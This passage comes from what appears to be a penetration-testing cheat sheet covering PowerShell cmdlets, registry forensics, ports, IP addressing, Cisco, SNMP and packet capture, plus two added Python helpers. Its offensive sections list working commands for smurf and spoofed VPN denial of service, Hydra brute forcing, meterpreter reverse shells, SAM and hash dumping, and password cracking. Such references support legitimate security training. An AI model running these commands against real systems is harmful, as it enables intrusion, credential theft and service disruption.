    Get-Culture # Get region information (language and keyboard la
    Get-Date # Get current date and time
    Get-DscConfiguration # Get the current config. of a node
    Get-DscLocalConfigurationManager # Get Local Config Manager settings
    Get-DscResource # Get Desired State Config. resources from a compute
    Get-Event # Get events in the PowerShell event queue
    Get-Eventlog # Get event log data (2003)
    Get-EventSubscriber # Get event subscribers
    Get-ExecutionPolicy # Get the execution policy for the shell
    Get-FormatData # Get the formatting data in the current session
    Get-Help # Open the help file
    Get-History # Get a listing of the session history
    Get-Host # Get host information (PowerShell Version and Region)
    Get-HotFix # Get installed hotfixes
    Get-Item # Get a file object or a registry (or other namespace) object
    Get-ItemProperty # Retrieve the properties of an object
    Get-Job # Get PowerShell background jobs that are running
    Get-Location # Get and display the current location
    Get-Member # Enumerate the properties of an object
    Get-Module # Get the modules imported to the session
    Get-Pfxcertificate # Get pfx certificate information
    Get-Process # Get a list of processes on a machine
    Get-PSBreakpoint # Get the currently set breakpoints
    Get-PSDrive # Get drive information (DriveInfo)
    Get-PSProvider # Get information for the specified provider
    Get-PSSession # Get the PSSessions in the current session
    Get-PSSessionConfiguration # Get the registered PS session configuration
    Get-PsSnapin # List PowerShell snap-ins on this computer
    Get-Random # Get a random number
    Get-Service # Get a list of services
    Get-Tracesource # Get components that are instrumented for tracing
    Get-Transaction # Get information about the active transaction
    Get-Uiculture # Get the UI culture information
    Get-Unique # Get the unique items in a collection
    Get-Variable # Get a PowerShell variable
    Get-WebApplicationMonitoringStatus # Get the monitoring status of web apps
    Get-WindowsFeature # Retrieve roles, role services, and features
    Get-WinEvent # Get event log data (Vista+)
    Get-WmiObject # Get WMI class information
    Get-WSManCredSSP # Get the Credential SSP configuration
    Get-WSManInstance # Display management information (XML or value)
    Group-Object # Group objects that contain the same value
    if # Conditionally perform a command
    Import-Alias # Import an alias list from a file
    Import-Clixml # Import a clixml file and rebuild the PS object
    Import-Counter # Import performance counter log files
    Import-Csv # Take values from a CSV list and send objects dow
    Import-GPO # Import Group Policy settings into a specified GPO
    Import-Module # Add a module to the session
    Import-PSSession # Import commands from another session
    Invoke-Command # Run commands on local and remote computers
    Invoke-Expression # Run a PowerShell expression
    Invoke-History # Invoke a previously executed Cmdlet
    Invoke-Item # Invoke an executable or open a file (START)
    Invoke-WmiMethod # Call WMI methods
    Invoke-WSManAction # Invoke an action on a specified object
    Job Trigger cmdlets # Get/Set Scheduled job triggers
    Join-Path # Combine a path and child-path
    Limit-EventLog # Limit the size of the event log
    Measure-Command # Measure running time
    Measure-Object # Measure the properties of an object
    Move-Item # Move an item from one location to another
    Move-ItemProperty # Move a property from one location to another
    New-Alias # Create a new alias
    New-DSCCheckSum # Create checksum files for DSC docs/resources
    New-Event # Create a new event
    New-Eventlog # Create a new event log and a new event source
    New-Item # Create a new item in a namespace
    New-ItemProperty # Set a new property
    New-Module # Create a new dynamic module (only in memory)
    New-Object # Create a new .Net object
    New-PSDrive # Create a mapped network drive
    New-PSSession # Create a persistent connection to a local or remote
    New-PSSessionOption # Advanced options for a PSSession
    New-Service # Create a new service
    New-Timespan # Create a timespan object
    New-Variable # Create a new variable
    New-WebServiceProxy # Create a Web service proxy object
    New-WSManInstance # Create a new instance of a management resource
    New-WSManSessionOption # Options for WSMan commands
    Out-Default # Send output to default
    Out-File # Send output to a file
    Out-GridView # Send output to an interactive table
    Out-Host # Send output to the host
    Out-Null # Send output to null
    Out-Printer # Send the output to a printer
    Out-String # Send objects to the host as strings
    Param # Script Parameters
    Pause # Pause and display the message "Press Enter to continue"
    Pop-Location # Set the current working location from the stack
    Powershell # Launch a PowerShell session
    Process # Function PROCESS block
    Push-Location # Push a location to the stack
    Quest AD # Read and write to Active Directory
    Read-Host # Read a line of input from the host console
    Receive-Job # Get PowerShell background job results
    Register-EngineEvent # Subscribe to PowerShell events
    Register-ObjectEvent # Subscribe to .NET events
    Register-PSSessionConfiguration # Create and register a new PS session confi
    Register-WmiEvent # Subscribe to a WMI event
    Remove-Computer # Remove the local computer from a workgroup or doma
    Remove-Event # Delete events from the event queue
    Remove-EventLog # Delete an event log
    Remove-Item # del/erase/rd/ri/rm/rmdir Delete an item
    Remove-ItemProperty # Remove a property and its value
    Remove-Job # Delete a PowerShell background job
    Remove-Module # Remove a module from the current session
    Remove-PSBreakpoint # Delete breakpoints from the current console
    Remove-PSDrive # Remove a provider/drive from its location
    Remove-PSSession # Close PowerShell sessions
    Remove-PSSnapin # Remove PowerShell snap-ins from the console
    Remove-Variable # Remove a variable and its value
    Remove-WindowsFeature # Remove roles, role services, and features
    Remove-WmiObject # Delete an instance of a WMI class
    Remove-WSManInstance # Delete a management resource instance
    Rename-Item # Change the name of an existing item
    Rename-ItemProperty # Rename a property of an item at its location
    Reset-ComputerMachinePassword # Reset the machine account password for the computer
    Resolve-Path # Resolves the wildcards in a path
    Restart-Computer # Restart the operating system on a computer
    Restart-Service # Stop and then restart a service
    Restore-Computer # Restore the computer to a previous state
    Restore-GPO # Restore one or all GPOs from a GPO backup
    Resume-Service # Resume a suspended service
    Return # Exit the current scope (function, script, or script block)
    Run/Call # Run a command (call operator)
    Scheduler # Get/Set scheduled jobs
    Select-Object # Select properties of objects
    Select-String # Search through strings or files for patterns
    Select-XML # Find text in an XML string or document
    Send-MailMessage # Send an email message
    Set-Acl # Set permissions
    Set-Alias # Create or change an alias
    Set-AuthenticodeSignature # Place a signature in a .ps1 script or other file
    Set-Content # Set content in the item (specific location)
    Set-Date # Set system time on the host system
    Set-ExecutionPolicy # Change the execution policy (user preference)
    Set-Item # Change the value of an item
    Set-ItemProperty # Set a property at the specified location to a specified value
    Set-Location # Set the current working location
    Set-PSBreakpoint # Set a breakpoint on a line, command, or variable
    Set-PSdebug # Turn script debugging on or off
    Set-PSSessionConfiguration # Change properties of a registered session config
    Set-Service # Change the start mode/properties of a service
    Set-StrictMode # Enforce coding rules in expressions & scripts
    Set-Tracesource # Trace a PowerShell component
    Set-Variable # Set a variable and a value
    Set-WmiInstance # Create or update an instance of an existing WMI class
    Set-WSManInstance # Modify the management information related to a resource
    Set-WSManQuickConfig # Configure the local computer for remote management
    Show-EventLog # Display an event log
    Sort-Object # Sort objects by property value
    Split-Path # Return part of a path
    Start-DscConfiguration # Apply Desired State config to nodes
    Start-Job # Start a PowerShell background job
    Start-Process # Start one or more processes
    Start-Service # Start a stopped service
    Start-Sleep # Suspend shell, script, or runspace activity
    Start-Transaction # Start a new transaction
    Start-Transcript # Start a transcript of a command shell session
    Stop-Computer # Stop (shut down) a computer
    Stop-Job # Stop a PowerShell background job
    Stop-Process # Stop a running process
    Stop-Service # Stop a running service
    Stop-Transcript # Stop the transcription process
    Suspend-Service # Suspend a running service
    Switch # Multiple if statements
    Tee-Object # Send input objects to two places
    Test-ComputerSecureChannel # Test and repair the secure channel to the domain
    Test-Connection # Ping one or more computers
    Test-Path # Return true if the path exists, otherwise return false
    Test-WSMan # Test if a computer is set up to receive remote commands
    Trace-Command # Trace an expression or command
    Trap # Handle a terminating error
    Try ... Catch # Handle a terminating error within a scriptblock
    Unblock-File # Unblock files downloaded from the Internet
    Undo-Transaction # Roll back a transaction
    Unregister-Event # Cancel an event subscription
    Unregister-PSSessionConfiguration # Delete registered PS session configuration
    Update-Formatdata # Update and append format data files
    Update-Help # Download and install help files
    Update-List # Add and remove items from a collection
    Update-TypeData # Update the current extended type configuration
    Use-Transaction # Add a command or expression to the transaction
    Wait-Event # Wait until a particular event is raised
    Wait-Job # Wait for a background job
    Wait-Process # Wait for a process to stop
    Where method # Filter objects from a collection
    Where-Object # Filter the objects passed along the command pipeline
    While # Loop while a condition is True
    Write-Debug # Write a debug message to the host display
    Write-Error # Write an object to the error pipeline
    Write-EventLog # Write an event to an event log
    Write-Host # Display text on screen (customized output to the host)
    Write-Output # Write an object to the pipeline
    Write-Progress # Display a progress bar
    Write-Verbose # Write a string to the host's verbose display
    Write-Warning # Write a string in reverse video to the display
    Zipfile # Compress or Extract zip files

[40]:

Windows registry
----------------

### Structure of the Windows Registry (hives) [[56]]

    HKEY_CLASSES_ROOT # Information stored here ensures that the correct program opens when it is executed in Windows Explorer.
    HKEY_CURRENT_USER # Contains configuration information for the user who is currently logged into the system, including user's folders, screen colors, and Control Panel settings
    HKEY_LOCAL_MACHINE # Contains machine hardware-specific information that the operating system runs on
    HKEY_USERS # Contains configuration information of all user profiles on the system, which concerns application configurations, and visual settings
    HKEY_CURRENT_CONFIG # Stores information about the system's current configuration. Alias for: HKLM\Config\profile

### Autorun locations

    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
    HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    (ProfilePath)\Start Menu\Programs\Startup

### MRU lists

MRU, or 'most recently used', lists contain entries made due to specific actions performed by the user. There are numerous MRU lists located throughout various Registry keys.

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

### UserAssist

The UserAssist key contains two or more subkeys which have long hexadecimal names that appear as globally unique identifiers (GUIDs). Each subkey records values that pertain to specific objects the user has accessed on the system, such as Control Panel applets, shortcut files, programs, etc.

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist

These values, however, are encoded using a ROT-13 encryption algorithm, sometimes known as a Caesar cipher. This particular encryption technique is quite easy to decipher, as each character is substituted with the character 13 spaces away from it in the ASCII table.
With the UserAssist key, a forensic examiner can gain a better understanding of what types of files or applications have been accessed on a particular system.

### Wireless networks

    HKLM\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces # SSIDs
    HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\ # flynn-net

### LAN computers

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions # List of devices, including desktop computers, laptops, and printers

### USB Devices

    HKLM\SYSTEM\ControlSet00x\Enum\USBSTOR # Key stores the contents of the product and device ID values of any USB device that has ever been connected to the system

### Mounted devices

    HKLM\SYSTEM\MountedDevices # Stores a database of mounted volumes that is used by the NTFS file system

### Firefox

Firefox has limited footprints regarding Registry activity. Firefox stores web history in a history.dat file, which is in ASCII format and plainly visible when opened.
    C:\Documents and Settings\User Profile\Application Data\Mozilla\Firefox\Profiles\x.default\

[56]:

Common ports
------------
[[6]]

| Port | Protocol | Description |
| ----------- |:------------------:| ------------:|
| 20 | TCP | FTP |
| 21 | TCP | FTP Control |
| 22 | TCP | SSH |
| 23 | TCP | Telnet |
| 25 | TCP | SMTP |
| 53 | UDP, TCP | DNS |
| 67 | UDP | DHCP Server |
| 68 | UDP | DHCP Client |
| 69 | UDP | TFTP |
| 80 | TCP | HTTP |
| 110 | TCP | POP3 |
| 119 | TCP | NNTP |
| 123 | UDP | NTP |
| 137 | UDP | NetBIOS Name Service |
| 138 | UDP | NetBIOS Datagram Service |
| 139 | TCP | NetBIOS Session Service |
| 143 | TCP | IMAP |
| 161 | UDP | SNMP |
| 162 | UDP | SNMP-trap |
| 389 | TCP | LDAP |
| 443 | TCP | HTTPS |
| 445 | TCP | Direct Hosting |
| 465 | TCP | SMTP |
| 546 | UDP | DHCP Client (IPv6) |
| 547 | UDP | DHCP Server (IPv6) |
| 569 | TCP | MSN |
| 587 | TCP | SMTP |
| 990 | TCP | FTPS |
| 993 | TCP | IMAP |
| 995 | TCP | POP3 |
| 1080 | TCP | SOCKS proxy |
| 1194 | TCP | OpenVPN |
| 3306 | TCP, UDP | MySQL database system |
| 3389 | TCP | RDP |
| 3689 | TCP | DAAP |
| 5432 | TCP, UDP | PostgreSQL database system |
| 5800 | TCP | VNC |
| 5900 | TCP | VNC |
| 6346 | TCP, UDP | Gnutella p2p network |
| 8080 | TCP | HTTP |

[6]:

IPv4
----

### CLASSFUL IP RANGES [[17]]

    Class A
    0.0.0.0         = 00000000.00000000.00000000.00000000
    127.255.255.255 = 01111111.11111111.11111111.11111111
    0nnnnnnn.HHHHHHHH.HHHHHHHH.HHHHHHHH

    Class B
    128.0.0.0       = 10000000.00000000.00000000.00000000
    191.255.255.255 = 10111111.11111111.11111111.11111111
    10nnnnnn.nnnnnnnn.HHHHHHHH.HHHHHHHH

    Class C
    192.0.0.0       = 11000000.00000000.00000000.00000000
    223.255.255.255 = 11011111.11111111.11111111.11111111
    110nnnnn.nnnnnnnn.nnnnnnnn.HHHHHHHH

    Class D
    224.0.0.0       = 11100000.00000000.00000000.00000000
    239.255.255.255 = 11101111.11111111.11111111.11111111
    1110XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX

    Class E
    240.0.0.0       = 11110000.00000000.00000000.00000000
    255.255.255.255 = 11111111.11111111.11111111.11111111
    1111XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX

- n: indicates a bit used for the network ID
- H: indicates a bit used for the host ID
- X: indicates a bit without a specified purpose

### Reserved ranges [[18]]

    0.0.0.0/8 # Used for broadcast messages to the current ("this")
    10.0.0.0/8 # Used for local communications within a private network
    100.64.0.0/10 # Used for communications between a service provider and its subscribers when using a carrier-grade NAT
    127.0.0.0/8 # Used for loopback addresses to the local host
    169.254.0.0/16 # Used for link-local addresses between two hosts on a single link when no IP address is otherwise specified, such as would have normally been retrieved from a DHCP server
    172.16.0.0/12 # Used for local communications within a private network
    192.0.0.0/24 # Used for the IANA IPv4 Special Purpose Address Registry
    192.0.2.0/24 # Assigned as "TEST-NET" for use in documentation and examples. It should not be used publicly
    192.88.99.0/24 # Used by 6to4 anycast relays
    192.168.0.0/16 # Used for local communications within a private network
    198.18.0.0/15 # Used for testing of inter-network communications between two separate subnets
    198.51.100.0/24 # Assigned as "TEST-NET-2" for use in documentation and examples. It should not be used publicly
    203.0.113.0/24 # Assigned as "TEST-NET-3" for use in documentation and examples. It should not be used publicly
    224.0.0.0/4 # Reserved for multicast
    240.0.0.0/4 # Reserved for future use
    255.255.255.255/32 # Reserved for the "limited broadcast" destination address

### Subnetting [[19]]

![class_a_subnets.jpg](https://www.dropbox.com/s/i7k6anrqrew7q8h/class_a_subnets.jpg?dl=0&raw=1)

### Calculating subnet range [[20]]

    Address:   192.168.0.1          11000000.10101000.00000000 .00000001
    Netmask:   255.255.255.0 = 24   11111111.11111111.11111111 .00000000
    Wildcard:  0.0.0.255            00000000.00000000.00000000 .11111111
    =>
    Network:   192.168.0.0/24       11000000.10101000.00000000 .00000000 (Class C)
    Broadcast: 192.168.0.255        11000000.10101000.00000000 .11111111
    HostMin:   192.168.0.1          11000000.10101000.00000000 .00000001
    HostMax:   192.168.0.254        11000000.10101000.00000000 .11111110
    Hosts/Net: 254                  (Private Internet)

[17]:
[18]:
[19]:
[20]:

IPv6
----

### Broadcast addresses [[21]]

    ff02:: # Link local: spans the same topological region as the corresponding unicast scope, i.e. all nodes on the same LAN
    ff05:: # Site local: is intended to span a single site
    ff08:: # Organization scope: intended to span multiple sites within the same organization
    ff0e:: # Global scope, assigned by IANA
    ff01:: # Interface local: spans only a single interface on a node and is useful only for loopback transmission of multicast

### Interface addresses [[22]]

    fe80:: # link-local
    2001:: # routable
    ::a.b.c.d # IPv4-compatible IPv6
    ::ffff:a.b.c.d # IPv4-mapped IPv6

### THC IPv6 Toolkit [[23]]

    rsmurf6 # Smurfs the local network of the victim

[21]:
[22]:
[23]:

Cisco commands
--------------

### Exec commands [[4]]

    <1-99> # Session number to resume
    connect # Open a terminal connection
    disconnect # Disconnect an existing telnet session
    enable # Turn on privileged commands
    exit # Exit from Exec mode
    help # Description of the interactive help system
    lat # Open a lat connection
    lock # Lock the terminal
    login # Log in as a particular user
    logout # Exit from Exec mode and log out
    menu # Start a menu-based user interface
    mbranch # Trace multicast route for branch of tree
    mrbranch # Trace reverse multicast route to branch of tree
    mtrace # Trace multicast route to group
    name-connection # Name an existing telnet connection
    pad # Open a X.29 PAD connection
    ping # Send echo messages
    resume # Resume an active telnet connection
    show # Show running system information
    systat # Display information about terminal lines
    telnet # Open a telnet connection
    terminal # Set terminal line parameters
    tn3270 # Open a tn3270 connection
    trace # Trace route to destination
    where # List active telnet connections
    x3 # Set X.3 parameters on PAD

### Common commands [[5]]

    ? # Help
    show running-configuration # Shows the router, switch, or firewall's current configuration
    copy running-configuration startup-configuration # Save the configuration that is currently being modified (in RAM), also known as the running-configuration, to the nonvolatile RAM (NVRAM)
    show interface # Displays the status of the router's interfaces
    show ip interface # Provides information about the configuration and status of the IP protocol and its services, on all interfaces
    config terminal, enable, interface, and router # Change modes
    no shutdown # Enables an interface (brings it up)
    show ip route # Show the router's routing table
    show version # Gives you the router's configuration register
    debug # Provides detailed debugging output on a certain application, protocol, or service

[4]:
[5]:

SNMP
----

### Concept [[43]]

![snmp.png](https://www.dropbox.com/s/srwfkxgbqyep6yo/snmp.png?dl=0&raw=1)

### Command Examples [[44]]

This command returns an administratively assigned name for this managed node.

    % snmpget -mALL -v1 -cpublic snmp_agent_Ip_address sysName.0

The snmpwalk command performs a sequence of chained GETNEXT requests automatically. It is a work-saving command.
    % snmpwalk -mALL -v1 -cpublic snmp_agent_Ip_address system

The snmpbulkwalk command uses the GETBULK SNMP protocol feature to query for an entire tree of information about a network entity.

    % snmpbulkwalk -mALL -v2c -cprivate snmp_agent_Ip_address entPhysicalTable>time7

[43]:
[44]:

Packet Capturing
----------------
[[38]]

    tcpdump -i eth0 # Capture Packets From Specific Interface
    tcpdump -c 5 -i eth0 # Capture Only N Number of Packets
    tcpdump -A -i eth0 # Print Captured Packets in ASCII
    tcpdump -D # Display Available Interfaces
    tcpdump -XX -i eth0 # Display Captured Packets in HEX and ASCII
    tcpdump -w 0001.pcap -i eth0 # Capture and Save Packets in a File
    tcpdump -r 0001.pcap # Read Captured Packets File
    tcpdump -n -i eth0 # Capture Packets Without Resolving Hostnames (show raw IP addresses)
    tcpdump -i eth0 tcp # Capture only TCP Packets
    tcpdump -i eth0 port 22 # Capture Packets from Specific Port
    tcpdump -i eth0 src 192.168.0.2 # Capture Packets from a Source IP
    tcpdump -i eth0 dst 50.116.66.139 # Capture Packets to a Destination IP

[38]:

DNS
---

### dnsrecon Usage Example [[7]]

Scan a domain (-d example.com), use a dictionary to brute force hostnames (-D /usr/share/wordlists/dnsmap.txt), do a standard scan (-t std), and save the output to a file (--xml dnsrecon.xml)

    dnsrecon -d example.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml

### Ping scan grepable output [[8]]

    # nmap -sn -oG - -iR 100
    # Nmap 5.35DC18 scan initiated [time] as: nmap -sn -oG - -iR 5
    Host: 93.182.218.153 () Status: Up
    Host: 154.223.142.85 () Status: Down
    Host: 120.128.8.97 () Status: Down
    Host: 47.159.134.149 () Status: Down
    Host: 24.172.4.19 () Status: Down
    # Nmap done at [time] -- 5 IP addresses (1 host up) scanned in 4.25 seconds

[7]:
[8]:

VPN
---

### Write PSK to a file [[50]]

    ike-scan -M -A vpn ip -P file

### DoS VPN SERVER

    ike-scan -A -t 1 --sourceip= spoof ip dst ip

[50]:

Brute Forcing Services
----------------------

### Hydra FTP Brute Force [[2]]

    hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V

### Hydra POP3 Brute Force

    hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V

### Hydra SMTP Brute Force

    hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V

[2]:

Exploit Research
----------------
[[9]]

    searchsploit windows 2003 | grep -i local # Search exploit-db for exploit, in this example windows 2003 + local esc
    site:exploit-db.com exploit kernel <= 3 # Use google to search exploit-db.com for exploits
    grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* # Search metasploit modules using grep - msf search

[9]:

Metasploit
----------

### Meterpreter Payloads [[36]]

    set payload windows/meterpreter/reverse_tcp # Windows reverse tcp payload
    set payload windows/vncinject/reverse_tcp # Meterpreter Windows VNC Payload
    set ViewOnly false
    set payload linux/meterpreter/reverse_tcp # Meterpreter Linux Reverse Payload

### Meterpreter Cheat Sheet

    upload file c:\\windows # Meterpreter upload file to Windows target
    download c:\\windows\\repair\\sam /tmp # Meterpreter download file from Windows target
    execute -f c:\\windows\temp\exploit.exe # Meterpreter run .exe on target - handy for executing uploaded exploits
    execute -f cmd -c # Creates new channel with cmd shell
    ps # Meterpreter show processes
    shell # Meterpreter get shell on the target
    getsystem # Meterpreter attempts privilege escalation on the target
    hashdump # Meterpreter attempts to dump the hashes on the target
    portfwd add -l 3389 -p 3389 -r target # Meterpreter create port forward to target machine
    portfwd delete -l 3389 -p 3389 -r target # Meterpreter delete port forward

### Auxiliary Metasploit Modules

    use auxiliary/scanner/http/dir_scanner # Metasploit HTTP directory scanner
    use auxiliary/scanner/http/jboss_vulnscan # Metasploit JBOSS vulnerability scanner
    use auxiliary/scanner/mssql/mssql_login # Metasploit MSSQL Credential Scanner
    use auxiliary/scanner/mysql/mysql_version # Metasploit MySQL Version Scanner
    use auxiliary/scanner/oracle/oracle_login # Metasploit Oracle Login Module

### Metasploit Powershell Modules

    use exploit/multi/script/web_delivery # Metasploit powershell payload delivery module
    post/windows/manage/powershell/exec_powershell # Metasploit upload and run powershell script through a session
    use exploit/multi/http/jboss_maindeployer # Metasploit JBOSS deploy
    use exploit/windows/mssql/mssql_payload # Metasploit MSSQL payload

[36]:

Password Cracking
-----------------

## John The Ripper - JTR [[39]]

### JTR password cracking

    john --wordlist=/usr/share/wordlists/rockyou.txt hashes

### JTR forced descrypt cracking with wordlist

    john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

### JTR show cracked descrypt hashes

    john --format=descrypt hash --show

[39]:
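The UserAssist section of the Windows registry notes above says the value names are ROT-13 encoded. The following Python decoder is an added example for that section, not code from the original cheat sheet: the sample value names are constructed (the folder GUID is made up, and the `UEME_RUNPATH:` prefix form is assumed as the shape older Windows versions use), and the regular expression that splits a decoded name into its leading folder GUID and the path is an assumption about the name layout. It shows the point a forensic examiner relies on: ROT-13 only touches ASCII letters, so hex letters inside the GUID are shifted too, while digits, braces, backslashes and dots pass through unchanged, and applying the same shift twice restores the original.

```python
"""Decode ROT-13 encoded UserAssist value names (added example, not from the page)."""
import re

# A decoded name often starts with a known-folder GUID followed by a backslash
# and the path relative to that folder; the layout assumption is this pattern.
GUID_PREFIX = re.compile(
    r"^\{([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}\\(.*)$"
)


def rot13(text: str) -> str:
    """Shift each ASCII letter 13 positions within its own alphabet (A-Z or a-z),
    wrapping around. Everything else passes through untouched. Because 13 + 13 = 26,
    the function is its own inverse, so it both encodes and decodes."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + 13) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + 13) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def decode_userassist_name(encoded: str) -> dict:
    """Decode one value name and split it into folder GUID and path.
    'guid' is None when the decoded name carries no GUID prefix."""
    decoded = rot13(encoded)
    match = GUID_PREFIX.match(decoded)
    if match:
        return {"decoded": decoded, "guid": match.group(1).upper(), "path": match.group(2)}
    return {"decoded": decoded, "guid": None, "path": decoded}


def decode_all(encoded_names) -> list:
    """Decode a batch of value names, sorted by decoded path for easier review."""
    records = [decode_userassist_name(name) for name in encoded_names]
    records.sort(key=lambda r: r["path"].lower())
    return records


# Constructed sample value names (the GUID is invented; hex letters A-F appear
# as N-S while encoded, which is why the GUID regex only matches after decoding).
SAMPLE_VALUE_NAMES = [
    r"{NOPQRS01-2345-6789-NOPQ-RS0123456789}\Zvpebfbsg Bssvpr\Jbeq.rkr",
    r"HRZR_EHACNGU:P:\Gbbyf\chggl.rkr",
]

if __name__ == "__main__":
    for record in decode_all(SAMPLE_VALUE_NAMES):
        print(f"guid={record['guid']!s:40} path={record['path']}")
```

The `GUID_PREFIX` pattern is deliberately applied only after decoding: while the name is still encoded, the hex letters of the GUID fall outside `[0-9A-F]`, so a name that matches the pattern before decoding is a sign it was stored in the clear rather than ROT-13 encoded.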
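The "Calculating subnet range" listing in the IPv4 section above is the output of a netmask calculation that can be reproduced, together with the classful table and the reserved-range list from the same section, in a few lines of standard-library Python. The script below is an added example and not part of the original cheat sheet; it uses the `ipaddress` module, the short names attached to the reserved ranges are abbreviations of the descriptions above, and it goes one step beyond the page's /24 example by also handling /31 point-to-point links and /32 single-host prefixes, where the "subtract network and broadcast" rule does not apply.

```python
"""Subnet, classful-class and reserved-range calculator (added example, not from the page)."""
import ipaddress

# Reserved ranges from the "Reserved ranges" list above, with shortened labels.
RESERVED_RANGES = {
    "0.0.0.0/8": "this network",
    "10.0.0.0/8": "private network",
    "100.64.0.0/10": "carrier-grade NAT",
    "127.0.0.0/8": "loopback",
    "169.254.0.0/16": "link-local",
    "172.16.0.0/12": "private network",
    "192.0.0.0/24": "IANA special purpose",
    "192.0.2.0/24": "TEST-NET",
    "192.88.99.0/24": "6to4 anycast relay",
    "192.168.0.0/16": "private network",
    "198.18.0.0/15": "inter-network testing",
    "198.51.100.0/24": "TEST-NET-2",
    "203.0.113.0/24": "TEST-NET-3",
    "224.0.0.0/4": "multicast",
    "240.0.0.0/4": "reserved for future use",
    "255.255.255.255/32": "limited broadcast",
}


def classful_class(address: str) -> str:
    """Class A-E from the leading bits of the first octet (CLASSFUL IP RANGES table)."""
    first = int(ipaddress.IPv4Address(address)) >> 24
    if first & 0b10000000 == 0:
        return "A"  # 0xxxxxxx
    if first & 0b11000000 == 0b10000000:
        return "B"  # 10xxxxxx
    if first & 0b11100000 == 0b11000000:
        return "C"  # 110xxxxx
    if first & 0b11110000 == 0b11100000:
        return "D"  # 1110xxxx
    return "E"      # 1111xxxx


def reserved_ranges_for(address: str) -> list:
    """Labels of every reserved range containing the address, most specific first."""
    addr = ipaddress.IPv4Address(address)
    hits = [(ipaddress.IPv4Network(cidr), label) for cidr, label in RESERVED_RANGES.items()]
    hits = [(net, label) for net, label in hits if addr in net]
    hits.sort(key=lambda h: h[0].prefixlen, reverse=True)
    return [label for _, label in hits]


def dotted_binary(addr: ipaddress.IPv4Address) -> str:
    """Four 8-bit groups, as in the listing above (e.g. 11000000.10101000.00000000.00000001)."""
    return ".".join(f"{octet:08b}" for octet in addr.packed)


def subnet_info(address: str, mask: str) -> dict:
    """Values from 'Calculating subnet range' for an address plus a mask given
    either as a prefix length ('24') or in dotted form ('255.255.255.0')."""
    addr = ipaddress.IPv4Address(address)
    net = ipaddress.IPv4Network(f"{address}/{mask}", strict=False)
    network, broadcast = net.network_address, net.broadcast_address
    if net.prefixlen <= 30:
        # Usual case: first address is the network, last is the broadcast.
        host_min, host_max, hosts = network + 1, broadcast - 1, net.num_addresses - 2
    elif net.prefixlen == 31:
        # Point-to-point link (RFC 3021): both addresses are usable hosts.
        host_min, host_max, hosts = network, broadcast, 2
    else:
        # /32: a single host; no separate network or broadcast address.
        host_min, host_max, hosts = network, network, 1
    return {
        "address": str(addr), "address_bits": dotted_binary(addr),
        "netmask": str(net.netmask), "prefixlen": net.prefixlen,
        "wildcard": str(net.hostmask), "network": str(net),
        "broadcast": str(broadcast), "hostmin": str(host_min), "hostmax": str(host_max),
        "hosts": hosts, "class": classful_class(address),
        "reserved": reserved_ranges_for(address),
    }


def format_report(info: dict) -> str:
    """Render the dict in the same shape as the listing above."""
    return "\n".join([
        f"Address:   {info['address']:<18} {info['address_bits']}",
        f"Netmask:   {info['netmask']} = {info['prefixlen']}",
        f"Wildcard:  {info['wildcard']}",
        f"Network:   {info['network']:<18} (Class {info['class']})",
        f"Broadcast: {info['broadcast']}",
        f"HostMin:   {info['hostmin']}",
        f"HostMax:   {info['hostmax']}",
        f"Hosts/Net: {info['hosts']}  ({', '.join(info['reserved']) or 'not reserved'})",
    ])


if __name__ == "__main__":
    print(format_report(subnet_info("192.168.0.1", "24")))  # the page's worked example
```

The reserved-range lookup returns every match ordered by prefix length, so an address such as 255.255.255.255 reports both the /32 limited-broadcast entry and the enclosing 240.0.0.0/4 block rather than silently picking one.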
--------------------------------------------------------------------------------